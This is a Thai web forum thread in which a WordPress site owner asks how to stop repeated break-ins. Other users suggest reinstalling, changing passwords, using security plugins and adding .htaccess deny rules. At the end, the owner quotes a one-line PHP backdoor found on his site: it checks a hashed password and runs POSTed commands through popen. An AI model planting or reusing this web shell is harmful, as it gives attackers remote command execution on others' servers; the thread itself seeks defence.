ต่อไป »

[canova]

อาจจะเขียนเวอร์ไปหน่อยแต่ มันแฮคผมเข้ามาบ่อยมาก ผมก็แก้ๆ มันก็แฮคอีก ตอนนี้เลยทำ htaccess ผมก้กันเต็มที่ แต่ก้ยังจะโดน

และก็ชอบโดน hack มานเจาะไปที่ wp-content/upload บ้าง wp-includes/wp-db.php ล่าสุด โดน ไปที่ plugin

ไม่ทราบว่ามีวิธีการบล๊อคไม่ให้คนอื่นเข้าไฟล์ พวกนี้ได้รึเปล่าครับ ผมโดนจนหงิงละ

ไม่รู้กันยังไงละคับ หรือมี code ที่ต้องใส่ htaccess เพิ่มรึเปล่า ผมไม่รู้จะกันไง

ออลืมบอก บางครั้งมันชอบเอาไฟล์ wp-mod.php มาใส่ในเวปผม ผมก็ลบออกตลอด ช่วยผมที

[gulmiku]

ลองไล่ดูตั้งแต่ plugin หรือ theme อาจมีช่องโหว่ทำให้ hacker เข้ามาได้ครับ
แต่ theme หรือ plugin ไม่มีปัญหานี่อาจจะมาจากช่องโหว่ของ hosting ที่ท่านใช้บริการ 

[canova]

ตอนนี้ใช้ hostgator อะครับ ผมได้ลองไล่ดูละนะครับ เจอประมาณนี้ ในส่วนของ error_log

PHP Warning:  Cannot modify header information - headers already sent by public_html/wp-content/plugins/download-manager/functions.php:445
 PHP Warning:  mysql_real_escape_string() expects parameter 1 to be string, array given in public_html/wp-includes/wp-db.php on line 1036

ผมลองเชคดูไฟล์เทียบกับตัวเก่าที่ backup ก้เหมือนเดิม ไม่รู้จะหาไงละคับ ลองเอาโต๊ดเปรียบเทียบก้เหมือนเดิม ปวดหัวจริงครับ

อะไรทำนองนี้ ขึ้นมาเยอะแยะเลย งงมากครับ ผมอยากได้วิธีป้องกันอะครับ แบบซ่อนไฟล์ไปเลยได้มั้ย หรือ block ให้เข้าได้แค่ ip ของผมไรอย่างนี้ มีวิธีไหนทำได้บ้างปะครับ

[sy12za]

backup ข้อมูล แล้วลงใหม่ครับ แก้ปัญหาเบื้ยงต้น

[canova]

คือ อย่างที่บอกไงครับ มีตัว backup อยุ่แล้ว แต่เดียวมันก้มาเจาะใหม่ ผมอยากได้วิธีป้องกัน แก้ปัญหาถาวรอะครับ

[Jir4yu]

วิธีป้องกันที่ง่ายที่สุดจากความเห็นส่วนตัวนะครับ

- ดูเรื่อง permission ไฟล์ (ลืมเปิด chmod 777) ทิ้งไว้หรือเปล่า
- ลงธีม / plugin จากเว็บไซต์ผู้พัฒนา หรือผู้ขายโดยตรงเท่านั้น ห้ามหาโหลดเถื่อนมาใช้
- ลองลง plugin iThemes Security แล้วปรับใช้ครับ

 

[xvlnw.com]

1. ลบไฟล์ทั้งหมด ยกเว้น wp-content/upload/ (ตรวจสอบด้วยว่ามีไฟล์ *.php อยู่หรือไม่?)
2. อัพโหลด Wordpress ใหม่ขึ้นไป ตั้งค่า DB ให้เรียบร้อย (ฐานข้อมูลเดิม)
3. ล็อคอินเข้า WP ข้อมูลล็อคอินเดิม ติดตั้งตรีมและปลั๊กอินใหม่ทั้งหมด (ที่ไม่แคร๊ก)
4. แนะนำปลั๊กอิน All in one WP Securoty & Firewall และเปิด Firewall, Brute Force

[tenzamak]

บางครั้งเรื่องอาจจะจบง่ายๆแค่ลองสแกนไวรัสในเครื่องที่อัพไฟลืนะครับ

ผมเจอเคสลูกค้าด่าโดนแฮกๆมาหลายรอบละ เชื่อไหม ผมแอบเปลี่ยนพาสไม่ให้ลุกค้าเข้า หายขาดเลย

ไอ้ที่แฮกจริงๆนะ ชาตินึงโดนหน  ชาตินึงจริงๆ

ฮ่าๆๆๆๆ

[canova]

iThemes Security เคยลองลงละครับ นี้ไม่ได้ช่วยเลยครับ เป็นตัวทำให้ hacker โกด ถล่มเวปผมราปเปนหน้ากองเลยครับ - - มันแค่ทำให้เข้ายากมากขึ้นเฉยๆ อยากได้แบบปรับพวก htaccess ไม่ก็ โค๊ดอะไรก็ได้ ซ่อนไฟล์พวก wp-content wp-include wp-admin พวกนี้ กันไม่ให้มันเห็นหรือทำให้เราใช้งานได้คนเดียว มีมะครับ ที่เขียนเป็น htaccess

[kenessar]

ลอง All In One WP Security & Firewall ดูครับ
https://wordpress.org/plugins/...-one-wp-security-and-firewall/

ลงแล้วตั้งค่าทุกเมนู ทุกแท็บ ผมเปลี่ยน url หน้าล็อกอินไปเลย + ป้องกัน Cookie ล็อกอิน + เปิดไฟร์วอล + ป้องกัน Brute Force (จริงๆมีมากกว่านี้ คอนฟิกกันมันเลยครับ)

แต่ก่อนจะลง แนะนำว่า เปลี่ยนรหัส FTP ด้วยนะครับ เผื่อแฮ็กเกอร์มันได้ข้อมูลไปแล้ว
อีกเรื่องที่เรามักจะมองข้ามก็คือ มัลแวร์ หรือ สปายแวร์ ในเครื่องเรานี่แหละครับ สแกนก่อน ไม่งั้นแก้ไปที่ฝั่งเซิฟเวอร์ไปก็ไร้ค่าครับ
เพราะยังไงมันก็ได้รหัสผ่าน ftp หรือเก็บข้อมูลจากในเครื่องเราอยู่ดีครับ

[adidog]

ลองลบธีมที่ไม่ได้ติดตั้งจาก wordpress ออก ปลั๊กอินที่โหลดมาจากที่อื่น ลบออกให้หมด
แล้วไล่ดูในไฟล์ที่เป็นตระกูล index.xxx หรือในธีม ลองไล่ดูเลยครับ ผมเพิ่งโดนมากับธีม เข็ดเลยธีม null ตัวดีเลย

[zero1150kfc]

ใช่ครับ เครื่องที่อัพและ อีกประเด็นหนึ่งเลย แนะนำเบื้องต้น
1. เปลี่ยน Passowrd ของ CP,FTP,WOrdpress อื่นๆทั้งหมด
2. ลงใหม่ให้หมด (ถ้าขยัน) เพราะผมเชื่อว่า เดะก็มาจากที่เดิมๆ นั้นแหละ
3. ห้ามใช้ ของ crack เป็นอันขาด หรือ Theme ที่เสียตังแต่แจกฟรี
4. ห้าม 777 กับ Folder ที่เป็นของ WP เด็ดขาด ถ้าจะใช้หแนะนำ ให้ใช้กับ Folder ที่เราสร้างขึ้นเอง(ตั้งชื่อแปลกๆ หน่อยนะ)ก่อนอัพเช็คด้วยให้วางแค่ที่อนุญาติเท่านั้น
5. ไหว้พระ ทุกวันครับ 

ผิดถูกอย่างไงก็ขออภัยด้วยครับ

[treehost]

ผมว่าโดนเยอะไปหรือเปล่า  น่าจะเกิดจากไม่ได้อัพเดท version   หรือ theme รั่วอะครับ 

[pandazz]

ข้อมูลน้อยไป ไหนๆ ก็โดนแฮคละ เอา หน้าเว้บมาดูโลด 

[morya]

เคยโดนเหมือนกัน แต่น่าจะเป็นที่โฮส wp ทุกตัวในโฮสนี้โดนแฮกหมด แต่โฮสอื่น ไม่โดน

[makoto]

หัวอกเดียวกันเลย จะบอกว่า ที่แนะนำกันเข้ามานั่น ผมก็เคยทำเป็นรอบที่ร้อยแล้ว
ถึงขนาดย้าย host หนีก็ยังโดน (สงสัยเป็นที่โปรแกรม ftp หรืออาจจะอยู่ในเครื่องผมเอง)
แต่ก็มั่นใจว่าไม่น่าจะมี ไอ้เรื่องมั่นใจนี่อาจจะพลาดแม้จะป้องกันเต็มที่
 
หลังๆ ผมเลยไม่แก้ล่ะ ปวดหัว แต่ป้องกันไว้เฉยๆ คือใส่ htaccess แบบ Deny from all ไม่ให้ใครเข้าเลย (รวมทั้งตัวเอง)
เวลาจะใช้ก็เข้าไปแก้ไขนามสกุลไฟล์ htaccess เอา แล้วก็จัดการไฟล์
ส่วน user ไม่ให้ใครสมัครเลย มีแต่ admin คนเดียว เปลี่ยน pass เอาแบบยากสุดๆ 15 ตัว อาทิตย์ละครั้งก็พอ
(pass ผมพิมพ์เป็นภาษาไทยแต่ keyboard ให้เป็นอังกฤษ เช่น pass ว่า รักกันไว้เถิดเราคนไทย จะออกมาว่า iyddyow;hg5bfgik8owmp แบบนี้)

ถ้ามันแกะได้ก็ยอม ผมก็ตั้งเป็นคำสติกเกอร์ท้ายรถบรรทุก เอามาแม่มซัก 100 ประโยค สลับกันไป หนุกหนาน

รู้สึกปลอดภัยมาเดือนกว่าๆ ล่ะ

[sMongPed]

*https://wordpress.org/plugins/wordfence/ ลองสแกนดู เผื่อไปรั่วตรงไหน

ถ้าไม่ได้มาจาก cms จาก backdoor

ก็อาจจะโดนที่ pass ftp ไปรึเปล่า


อ่ะ เห็นบอกอยากได้

โค๊ด:

<FilesMatch "(wp-.*\.php|\.htaccess|\.htpasswd)">
Order Deny,Allow
Deny from All
</FilesMatch>

ถ้ามี vpn/proxie ส่วนตัวก็เพิ่มไอพีเข้าไป ไม่งั้นเวลาจะใช้ทีนึงก็มา comment โค้ดเอา

โค๊ด:

<FilesMatch "(wp-.*\.php|\.htaccess|\.htpasswd)">
Order Deny,Allow
Deny from All
Allow from 111.222.333.444
</FilesMatch>

[tenzamak]

ไม่ลองวิธีผมหน่อยหรอครับ เปลี่ยนะาสหนีแล้วห้ามเข้า ถ้ามันหาย กรอบมันก็แคบลงเยอะนะครับ

[NaiTan]

เขียน .htaccess

โค๊ด:

<Files *.php>
Order Deny,Allow
Deny from all
Allow from 127.0.0.1
</Files>

<Files index.php>
Order Allow,Deny
Allow from all
</Files>

[canova]

ขออนุญาติตอบเป็นข้อๆ ไปนะครับ
-สำหรับวิธีที่แนะนำมาเกี่ยวกับการลบ pass และเปลี่ยน มันก็แค่ยืดเวลาออกไปเช่นกัน สุดท้ายก้เจาะได้อยุ่ดีครับ ลองมาหลายรอบละ แต่เห็นเวปนอกเค้าบอกให้เปลี่ยน 90 วัน ต่อ 1 ครั้ง

-ถัดมานะครับที่บอก permission ไม่น่ามีปัญหาเพราะผมจัดการเป็น644 หมดละ แต่ที่ผมบอกว่ากันไม่อยู่ก็เพราะ พวกนี้มันเจาะรหัสโดยการสร้างไฟล์ขึ้นมา เช่น wp-mod.php พอเข้าไปอ่านก็มีการแก้ โค๊ด ตั้งแต่ สร้างระบบสมัครสมาชิกเอง และซ่อนไว้ไม่ให้โชว์แสดงผล ไม่ก็แก้โค๊ดนั้นนู้นนี้ เพื่อเปิด permission ผมไม่รู้ว่าทำไงนะ แต่ผมโดนมาละ พวกรัสเซียนี้เลยตัวเก่ง บางทีก็เข้าไปใน wp-cron ไรพวกนี้ ดังนั้น ผมเลยคิดว่า การสร้างไฟล์ htaccess มันน่าจะเซฟกว่า เพราะตอนนี้ยังไม่โดนนะครับ แต่คิดว่าเดียวมันคงทำได้อีก

-และก็ plugin เวปผมก็เป็นตัวพวกทั่วๆไป จะบอกว่ามี 6-7 ปลั๊กอิน แต่ครับ ย้ำ แต่ๆๆๆ มันก็ยังพยายามเข้ามาแก้ไขไฟล์ของผม ผมเลยใช้วิธี ที่คล้ายกับคุณ sMongPed มันเลยแก้ไขไม่ได้ แต่ผมก็ไม่อยากชะล่าใจนัก เพราะสิ่งที่เห็นอาจจะไม่ใช่อย่างที่คิด เพราะที่แน่ๆ โดนเจาะเข้ามาละครับ เหมือนพยาธิดีๆ

-อ่าผมอยากจะถามพอดีสำหรับคุณ sMongPed ส่งโค๊ดมา ขอบคุณมาก อยากทราบว่ามันเหมือนกับอันนี้ของคุณ NaiTan มั้ยครับ หรือว่าของคุณครอบจักรวาลกว่า ?
<Files *.php>
Order Deny,Allow
Deny from all
Allow from 127.0.0.1
</Files>

<Files index.php>
Order Allow,Deny
Allow from all
</Files>

-ส่วนวิธีที่ว่าให้แก้ไข ftp ในส่วนของ pass ขอทำความเข้าใจก่อนนะครับ เท่าที่ผมเข้าใจคือ cpanel กับ ftp จะใช้รหัสตัวเดียวกันใช่มะครับ ซึ่งผมทำการเปลี่ยนรหัสในส่วนของ cpanel แล้วครับผม แต่ในความรู้สึกของผม ผมก็คิดว่าน่าจะเข้ามาจากทางนี้เหมือนกัน ดังนั้นใครพอมีวิธีเปลี่ยน pass ของ ftp บอกผมหน่อยนะครับ ผมลองใช้ cpanel แล้วมันไม่มีให้กดเปลี่ยนเฉพาะไฟล์

-สำหรับในส่วนของ ปลั๊กอิน เดียวผมกำลังจะลองลงนะครับ ตัว All in one ขอบคุณตัวนี้มาก

-และวิธีของคุณ tenzamak คือ อย่างที่บอกครับ มันสามารถสมัครสมาชิกของมันได้เอง ตั้งตัวเองเป็น admin และซ่อนไม่แสดงผล แต่ไม่รู้ทำไมเหมือนกันครับ ว่าพวกนี้จะลบข้อมูล post ไม่ได้ ถ้าลบได้ก็จะไปกองอยู่ในส่วนของ ถัังขยะ ไม่หายไปเลย ซึ่้งข้อมูลนี้เป็นข้อมูลล่าสุด แต่ผมเคยเจอแบบหนักกว่านี้ คือ มาลบบทความผมไปเลย

ปล.สำหรับเพื่อนๆที่ยังไม่เคยเจอกรณีแบบผม ก็เข้ามาศึกษาได้นะครับ และสุดท้ายนี้ นี้คือ โค๊ดส่วนหนึ่งที่ผมโดน hack ลองไปแปลดุว่าคือไร (อยากจะบอกว่าตัวนี้สั้น เคยโดนยาวกว่านี้ เดียวไว้เอามาลงให้ดู)
<?php if(isset($_POST["hash"]) and @md5($_POST["hash_access"]) == "5651899bce466094a582e8d95ba5ad71"){$fp = popen($_POST["code"], "r"); while (!feof($fp)) {echo fgets ($fp, 1024);}  fclose($fp); die;} ?>